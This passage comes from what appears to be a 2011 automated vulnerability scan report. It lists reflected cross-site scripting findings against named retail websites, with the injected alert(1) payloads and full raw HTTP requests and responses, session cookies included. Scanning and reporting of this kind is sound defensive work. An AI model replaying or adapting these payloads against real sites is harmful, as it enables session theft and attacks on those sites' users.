Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /catalog/search.cmd?form_state=searchForm&keyword=notebook%2C+lap28630"%3balert(1)//f551f39996d&search.x=13&search.y=16 HTTP/1.1
Host: www.fingerhut.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.fingerhut.com/thumbnail/Holiday-Big-Book/Holiday-Decor-Outdoor/Mcatp/cat_3960/3965.uts
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PIPELINE_SESSION_ID=ba4af2d57f000001339214b172a591b6; __g_u=345318391677701_1_0.1_0_5_1317817466939; sifrFetch=true; __utmz=142754730.1317385478.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_vi=[CS]v1|2742DA83851D1A74-40000138C00372A3[CE]; bnTrail=%5B%22http%3A%2F%2Fwww.fingerhut.com%2F%22%5D; JSESSIONID=24F231F158C9DAFA0DDFF6813F5AFE3A; __g_c=w%3A1%7Cb%3A3%7Cc%3A345318391677701%7Cd%3A1%7Ca%3A0%7Ce%3A0.1%7Cf%3A0; mbox=session#1317385467182-654123#1317387425|PC#1317385467182-654123.19#1319977565|check#true#1317385625; s_cc=true; s_sq=%5B%5BB%5D%5D; isvtid_ets=1317385569015; IS3_History=0-0-0____; bn_u=6923748352943532724; utag_main=_st:1317387373052$ses_id:1317386390499%3Bexp-session; isvt_visitor=uwoRHgoBC2YAAEcaGKMAAAAAADf565SmOKkbKG; __utma=142754730.3208640.1317385478.1317385478.1317385478.1; __utmb=142754730.2.10.1317385478; __utmc=142754730; IS3_GSV=DPL-0_TES-1317385569_PCT-1317385569_GeoIP-50.23.123.106_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-_GeoCc-NA_GeoCn-United%20States_GeoDa-623_GeoAc-214_GeoLa-32.782501_GeoLo-%252D96.820702_GeoIs-_GeoOr-

Response

HTTP/1.1 200 OK
Server: Apache
Vary: Accept-Encoding
Content-Length: 115601
Content-Type: text/html;charset=UTF-8
Date: Fri, 30 Sep 2011 12:27:16 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html
>
<head>
<style type="text/css">
body {

...[SNIP]...
page_name_es : "ES_SearchPage", // Espanol name of page viewed
       customer_id : "", // customer identifier
       page_language_indicator: language_indicator, // EN or ES
   
       search_term : "notebook, lap28630";alert(1)//f551f39996d", // search term entered by customer
       search_category : "", // category id
           
       life_stage : "" // LifeStageIndicator
   
   };
</script>
...[SNIP]...

3.363. http://www.flyingmule.com/Merchant2/merchant.mvc [Page parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.flyingmule.com
Path:   /Merchant2/merchant.mvc

Issue detail

The value of the Page request parameter is copied into the HTML document as plain text between tags. The payload fbed7<script>alert(1)</script>33b2c5913b was submitted in the Page parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Merchant2/merchant.mvc?Page=minibasketfbed7<script>alert(1)</script>33b2c5913b&Frame=none&Session_ID= HTTP/1.1
Host: www.flyingmule.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.flyingmule.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 30 Sep 2011 12:24:39 GMT
Server: Apache/2.0.52 (CentOS)
Set-Cookie: htscallerid=38af55fb912621295cd4a73301f80043; expires=Sat, 29-Sep-2012 12:24:39 GMT; path=/
P3P: CP="NOI DEVa TAIa OUR BUS UNI STA"
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 2028


<HTML>


<HEAD><TITLE>The Flying Mule</TITLE><meta http-equiv="Content-Language" content="en-us"><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><
...[SNIP]...
</TABLE>


OUI-%INCLUDE%: File "/html/minibasketfbed7<script>alert(1)</script>33b2c5913b/index.shtml" does not exist!
<TABLE>
...[SNIP]...

3.364. http://www.gnc.com/search/controller.jsp [kw parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.gnc.com
Path:   /search/controller.jsp

Issue detail

The value of the kw request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bedee'%3balert(1)//e646358c25c72e35d was submitted in the kw parameter. This input was echoed as bedee';alert(1)//e646358c25c72e35d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /search/controller.jsp?kw=xss+protien+food+powerbedee'%3balert(1)//e646358c25c72e35d&f=Taxonomy%2FGNC%2F3593182 HTTP/1.1
Host: www.gnc.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
Origin: http://www.gnc.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.gnc.com/family/index.jsp?categoryId=11357303
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=18LCTFwLmKSzXmK1LTFhvdLn2jrLCB8VTbLQJBZkCRwZ6nDt3vPR!631161787; browser_id=152600176413; __g_u=96143531661653_0; __g_c=c%3A96143531661653%7Cd%3A0%7Ca%3A0; recommendationUid=4F3F8B20-763A-5480-90F3-DFE588224975; s_vi=[CS]v1|2742D81605158425-400001808002115D[CE]; rvdata=XR240e18041a58421354174742525e0b020f17; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; PrefID=51-282502593; ub_76=bid=152600176413&uid=0&fvd=1317384233&lvd=1317384233&nov=1&ordAmt=0&lOrdDate=0&lOrdPids=0&rvPid=0&rvCid=11357303&sKw=0&cPid=0&cDt=0&cAmt=0&wlPids=0&wlDate=0&sId=1214483595&mks=0&curr=USD&oId=0; mt.v=1.783223501.1317384206440; s_pers=%20s_lastvisit%3D1317384232754%7C1411992232754%3B%20s_nr%3D1317384552696%7C1319976552696%3B%20gpv_p6%3DShop%253A%252011357303%253A%2520Branding%2520Pages%7C1317386352701%3B

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 30 Sep 2011 12:10:44 GMT
Server: Apache/2.0.63 (Unix)
Cache-Control: no-cache="set-cookie"
Set-Cookie: rvdata=XR240e18041a58421354174742525e1d1e12521b52000649170b470f1c1b0152150b57110003010108041307451d12117c5a0b16795f504757104b4617525f161f152d121b5d53491e521b1c0c453b73460e0100001f1b1f000042060b100b151e0c17071f0f6c0a464d445a52501712045a454b5e4219494a4f271c0b4e6d0f0c1d0b53091c03001f0f54533a4e135c4f4d59544e7307014f254e0400190c1d20665b50551d1c315f095a102308155f491174581011151c521e1b0e58495c5a13565c4344755e3c59245c14755d5d11775a040951404537504307161755011f7d580a19531a5350134f001b040a450b0e1d0f001f1d571717535d4245544e045a4541420300045d04435c1913051464115d026d085e104f1740441706084415412c12001a170d5d05465a4012653205520a06055d440c5c4543000a42571517151d005d00331d1f0d1b0c0948124f5e5d194342465c4b0d12664456127f5b53135c171b4144575b4349197e570017135f4c495320411e522e1a1d0a0049094f3d0b411443573513595d157054540e4e0071575c0c5f584b0d50524a5c41474010435e4f2147364061484f2e084c503d1e021a154a10620412074a4f56011a78524e581451; expires=Wednesday, 18-Oct-2079 15:24:52 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 97926


                                               <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "h
...[SNIP]...
<script type="text/javascript">


                       var csSiteSearchTerm ='xss protien food powerbedee';alert(1)//e646358c25c72e35d';
           var csSiteSearchResultCount=0;
           

</script>
...[SNIP]...

3.365. http://www.gnc.com/search/index.jsp [origkw parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.gnc.com
Path:   /search/index.jsp

Issue detail

The value of the origkw request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3c101'%3balert(1)//26f75d693a9 was submitted in the origkw parameter. This input was echoed as 3c101';alert(1)//26f75d693a9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /search/index.jsp?kwCatId=&kw=xss%20protien%20food%20power&origkw=xss+protien+food+power3c101'%3balert(1)//26f75d693a9&f=Taxonomy/GNC/3593182&sr=1 HTTP/1.1
Host: www.gnc.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.gnc.com/family/index.jsp?categoryId=11357303
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=18LCTFwLmKSzXmK1LTFhvdLn2jrLCB8VTbLQJBZkCRwZ6nDt3vPR!631161787; browser_id=152600176413; __g_u=96143531661653_0; __g_c=c%3A96143531661653%7Cd%3A0%7Ca%3A0; recommendationUid=4F3F8B20-763A-5480-90F3-DFE588224975; s_vi=[CS]v1|2742D81605158425-400001808002115D[CE]; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; PrefID=51-282502593; ub_76=bid=152600176413&uid=0&fvd=1317384233&lvd=1317384233&nov=1&ordAmt=0&lOrdDate=0&lOrdPids=0&rvPid=0&rvCid=11357303&sKw=0&cPid=0&cDt=0&cAmt=0&wlPids=0&wlDate=0&sId=1214483595&mks=0&curr=USD&oId=0; mt.v=1.783223501.1317384206440; s_pers=%20s_lastvisit%3D1317384232754%7C1411992232754%3B%20s_nr%3D1317384552696%7C1319976552696%3B%20gpv_p6%3DShop%253A%252011357303%253A%2520Branding%2520Pages%7C1317386352701%3B; rvdata=XR240e18041a58421354174742525e1d1e12521b52000649170b470f1c1b0152150b571100

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 30 Sep 2011 12:11:11 GMT
Server: Apache/2.0.63 (Unix)
Cache-Control: no-cache="set-cookie"
Set-Cookie: rvdata=XR240e18041a58421354174742525e1d1e12521b52000649170b470f1c1b0152150b5711001d53035a52474e125d070560114b127f0b46405d164e4a4d0009471e19700d1f19465e5d155609580237714556575d450b405a5c4b431f0b410c4d474b5b4f4f1e7157464c160c570e174454455d074f080c1c0a1276460b057e0a02575c164b4b425009161c462a0a0652584a431150210e1a492400540901060b00220016015e2035595b5b41634c15524e007104595e550b465e0a51155c41474010435e4f2147364061484f2e084c503d1e021a114b1766045657405357544f6f521203055b4312041543410550550e514b17581c01000217081d1a110b52030b4f1052110b1208131753175b0702731453426d5b064758401d4744065d4a50583a1d435e52061a49110645463a3c44411e0b570a0668044514065c570f49500b47101c45760e421d4708040c0858424a19435f5e4d505d4e7313014f2949131d18160b124351084009127b0f461d441c02034276535c43730b410e5c0d5a41310b1d1c5f5370111e005428091a4f4a4f2c054c190918171c085618450a16520d114e02361c361b201c44740d0f44; expires=Wednesday, 18-Oct-2079 15:25:19 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 96301


                                               <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "h
...[SNIP]...
<script type="text/javascript">


                       var csSiteSearchTerm ='xss protien food power3c101';alert(1)//26f75d693a9';
           var csSiteSearchResultCount=0;
           

</script>
...[SNIP]...

3.366. http://www.gnc.com/search/noResults.jsp [origkw parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.gnc.com
Path:   /search/noResults.jsp

Issue detail

The value of the origkw request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d1999'%3balert(1)//3a901cb32b6 was submitted in the origkw parameter. This input was echoed as d1999';alert(1)//3a901cb32b6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /search/noResults.jsp?kwCatId=&kw=xss%20protien%20food%20power&origkw=xss+protien+food+powerd1999'%3balert(1)//3a901cb32b6&f=Taxonomy/GNC/3593182&sr=1 HTTP/1.1
Host: www.gnc.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.gnc.com/family/index.jsp?categoryId=11357303
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=18LCTFwLmKSzXmK1LTFhvdLn2jrLCB8VTbLQJBZkCRwZ6nDt3vPR!631161787; browser_id=152600176413; __g_u=96143531661653_0; __g_c=c%3A96143531661653%7Cd%3A0%7Ca%3A0; recommendationUid=4F3F8B20-763A-5480-90F3-DFE588224975; s_vi=[CS]v1|2742D81605158425-400001808002115D[CE]; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; PrefID=51-282502593; ub_76=bid=152600176413&uid=0&fvd=1317384233&lvd=1317384233&nov=1&ordAmt=0&lOrdDate=0&lOrdPids=0&rvPid=0&rvCid=11357303&sKw=0&cPid=0&cDt=0&cAmt=0&wlPids=0&wlDate=0&sId=1214483595&mks=0&curr=USD&oId=0; mt.v=1.783223501.1317384206440; s_pers=%20s_lastvisit%3D1317384232754%7C1411992232754%3B%20s_nr%3D1317384552696%7C1319976552696%3B%20gpv_p6%3DShop%253A%252011357303%253A%2520Branding%2520Pages%7C1317386352701%3B; rvdata=XR240e18041a58421354174742525e1d1e12521b52000649170b470f1c1b0152150b571100

Response

HTTP/1.1 200 OK
Date: Fri, 30 Sep 2011 12:10:43 GMT
Server: Apache/2.0.63 (Unix)
Cache-Control: no-cache="set-cookie"
Set-Cookie: rvdata=XR240e18041a58421354174742525e1d1e12521b52000649170b470f1c1b0152150b5711001d1c161e4102194f1b0f453d55084f220d430200041c01745159421d11750f5d4b15590c4415580011626a5c191d17001f0607111b450d4f13011b1649151c5945315b44484358425b1741140a5c5618015b5d591036445919311110014f030b1c000c081d0c462601070e505647545267555f11705215510b5c5f42360e51011d17691d0f5b17255f564f4d1d21410850510c110b5e584d4545570707571f05671c761c714f0572080e056059035143104337524a04170a1d175d6a11040e5400164e41461b1d05441502161719155d47114a57555b43155616075610464451015c5a58115213091a5820064e503f06171b0a1d59151b0a09535c4f3e0b111b125c5f1854090700676510045753190c4d5b030e58101c551e061d1d0c16400025001f1d5219081f1152500009034c505b01011336415c137550574a130b0a0054151f1c58492c0043484f565411503c160b522057445f0f5b5d41610b53564e126259555c45755e475715147b1d141a154f021c061545455714555f5c48002541244b334842235d0e416b51535016471265504704; expires=Wednesday, 18-Oct-2079 15:24:51 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 97765


                                               <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "h
...[SNIP]...
<script type="text/javascript">


                       var csSiteSearchTerm ='xss protien food powerd1999';alert(1)//3a901cb32b6';
           var csSiteSearchResultCount=0;
           

</script>
...[SNIP]...

3.367. http://www.hertzfurniture.com/45-years.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hertzfurniture.com
Path:   /45-years.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d0a14"><script>alert(1)</script>4b46dabcdac was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /45-years.htmld0a14"><script>alert(1)</script>4b46dabcdac HTTP/1.1
Host: www.hertzfurniture.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.hertzfurniture.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: IPE35522=IPE35522; SN49ef2d0a88e46=t4ljur1050ha4n9j2s5tpil855; kmCheck=49d29d7798654d54983e8f51dfcbc227; kmS6633=8724330e5e1e4e0c9955f42eddb6ccbb; kmE6633=1:0|15247,; kmL6633=1|0|Campaign not provided|AdGroup not provided|Raw Query not available|unk|burp|Raw Query not available; WRUID=410325474.977200202; __utma=1.1833889000.1317384676.1317384676.1317384676.1; __utmb=1.11.9.1317384846493; __utmc=1; __utmz=1.1317384676.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=1.|1=Visitor=1833889000=1

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.53
Date: Fri, 30 Sep 2011 12:35:57 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="NOI NID ADMa OUR IND UNI COM NAV"
Cache-Control: private, must-revalidate
Set-Cookie: SN49ef2d0a88e46=t4ljur1050ha4n9j2s5tpil855%2527%2527; path=/
Vary: User-Agent
Content-Length: 13703

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN"
   "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">


<!--[if lt IE 7 ]> <html xmlns="http://www.w3.org/1999/xhtml" version="-//W3C//DTD XHTML 1.1//
...[SNIP]...
<link rel="canonical" href="http://www.hertzfurniture.com/45-years.htmld0a14"><script>alert(1)</script>4b46dabcdac" />
...[SNIP]...

3.368. http://www.hertzfurniture.com/45-years.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.hertzfurniture.com
Path:   /45-years.html

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 75904<a>ed6b9a31c65 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /45-years.html75904<a>ed6b9a31c65 HTTP/1.1
Host: www.hertzfurniture.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.hertzfurniture.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: IPE35522=IPE35522; SN49ef2d0a88e46=t4ljur1050ha4n9j2s5tpil855; kmCheck=49d29d7798654d54983e8f51dfcbc227; kmS6633=8724330e5e1e4e0c9955f42eddb6ccbb; kmE6633=1:0|15247,; kmL6633=1|0|Campaign not provided|AdGroup not provided|Raw Query not available|unk|burp|Raw Query not available; WRUID=410325474.977200202; __utma=1.1833889000.1317384676.1317384676.1317384676.1; __utmb=1.11.9.1317384846493; __utmc=1; __utmz=1.1317384676.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=1.|1=Visitor=1833889000=1

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.53
Date: Fri, 30 Sep 2011 12:35:58 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="NOI NID ADMa OUR IND UNI COM NAV"
Cache-Control: private, must-revalidate
Set-Cookie: SN49ef2d0a88e46=t4ljur1050ha4n9j2s5tpil855%2527%2527; path=/
Vary: User-Agent
Content-Length: 13655

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN"
   "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">


<!--[if lt IE 7 ]> <html xmlns="http://www.w3.org/1999/xhtml" version="-//W3C//DTD XHTML 1.1//
...[SNIP]...
<div class="url">The requested URL www.hertzfurniture.com/45 years.html75904<a>ed6b9a31c65 doesn't exist.</div>
...[SNIP]...

3.369. http://www.hertzfurniture.com/Library-Chairs--Educational-Edge-Wood-Chair-in-Natural--3759--mo.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.hertzfurniture.com
Path:   /Library-Chairs--Educational-Edge-Wood-Chair-in-Natural--3759--mo.html

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload a04b9<a>959a651c2ad was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /Library-Chairs--Educational-Edge-Wood-Chair-in-Natural--3759--mo.htmla04b9<a>959a651c2ad HTTP/1.1
Host: www.hertzfurniture.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.hertzfurniture.com/45-years.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: IPE35522=IPE35522; WRUID=410325474.977200202; SN49ef2d0a88e46=t4ljur1050ha4n9j2s5tpil855; __utma=1.1833889000.1317384676.1317384676.1317384676.1; __utmb=1.12.9.1317384846493; __utmc=1; __utmz=1.1317384676.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=1.|1=Visitor=1833889000=1; kmCheck=0e3162c350804bc1b5f8f35069f28142; kmS6633=8724330e5e1e4e0c9955f42eddb6ccbb; kmE6633=1:0|15247,; kmL6633=1|0|Campaign not provided|AdGroup not provided|Raw Query not available|unk|burp|Raw Query not available

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.53
Date: Fri, 30 Sep 2011 12:35:09 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="NOI NID ADMa OUR IND UNI COM NAV"
Cache-Control: private, must-revalidate
Set-Cookie: SN49ef2d0a88e46=t4ljur1050ha4n9j2s5tpil85578345384e53155c88b649bd6; path=/
Vary: User-Agent
Content-Length: 12050

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN"
   "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">


<!--[if lt IE 7 ]> <html xmlns="http://www.w3.org/1999/xhtml" version="-//W3C//DTD XHTML 1.1//
...[SNIP]...
<div class="url">The requested URL www.hertzfurniture.com/Library Chairs Educational Edge Wood Chair in Natural 3759 mo.htmla04b9<a>959a651c2ad doesn't exist.</div>
...[SNIP]...

3.370. http://www.hertzfurniture.com/Library-Chairs--Educational-Edge-Wood-Chair-in-Natural--3759--mo.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hertzfurniture.com
Path:   /Library-Chairs--Educational-Edge-Wood-Chair-in-Natural--3759--mo.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a9ad6"><script>alert(1)</script>907c9515330 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Library-Chairs--Educational-Edge-Wood-Chair-in-Natural--3759--mo.htmla9ad6"><script>alert(1)</script>907c9515330 HTTP/1.1
Host: www.hertzfurniture.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.hertzfurniture.com/45-years.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: IPE35522=IPE35522; WRUID=410325474.977200202; SN49ef2d0a88e46=t4ljur1050ha4n9j2s5tpil855; __utma=1.1833889000.1317384676.1317384676.1317384676.1; __utmb=1.12.9.1317384846493; __utmc=1; __utmz=1.1317384676.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=1.|1=Visitor=1833889000=1; kmCheck=0e3162c350804bc1b5f8f35069f28142; kmS6633=8724330e5e1e4e0c9955f42eddb6ccbb; kmE6633=1:0|15247,; kmL6633=1|0|Campaign not provided|AdGroup not provided|Raw Query not available|unk|burp|Raw Query not available

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.53
Date: Fri, 30 Sep 2011 12:04:24 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="NOI NID ADMa OUR IND UNI COM NAV"
Cache-Control: private, must-revalidate
Set-Cookie: SN49ef2d0a88e46=t4ljur1050ha4n9j2s5tpil85578345384e53155c88b649bd6; path=/
Vary: User-Agent
Content-Length: 12098

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN"
   "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">


<!--[if lt IE 7 ]> <html xmlns="http://www.w3.org/1999/xhtml" version="-//W3C//DTD XHTML 1.1//
...[SNIP]...
<link rel="canonical" href="http://www.hertzfurniture.com/Library-Chairs--Educational-Edge-Wood-Chair-in-Natural--3759--mo.htmla9ad6"><script>alert(1)</script>907c9515330" />
...[SNIP]...

3.371. http://www.hertzfurniture.com/Library-Furniture--20--no.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.hertzfurniture.com
Path:   /Library-Furniture--20--no.html

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 72f0a<a>7a179e9882c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /Library-Furniture--20--no.html72f0a<a>7a179e9882c HTTP/1.1
Host: www.hertzfurniture.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.hertzfurniture.com/search.php?find-box=xss%20circle%20shoes
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
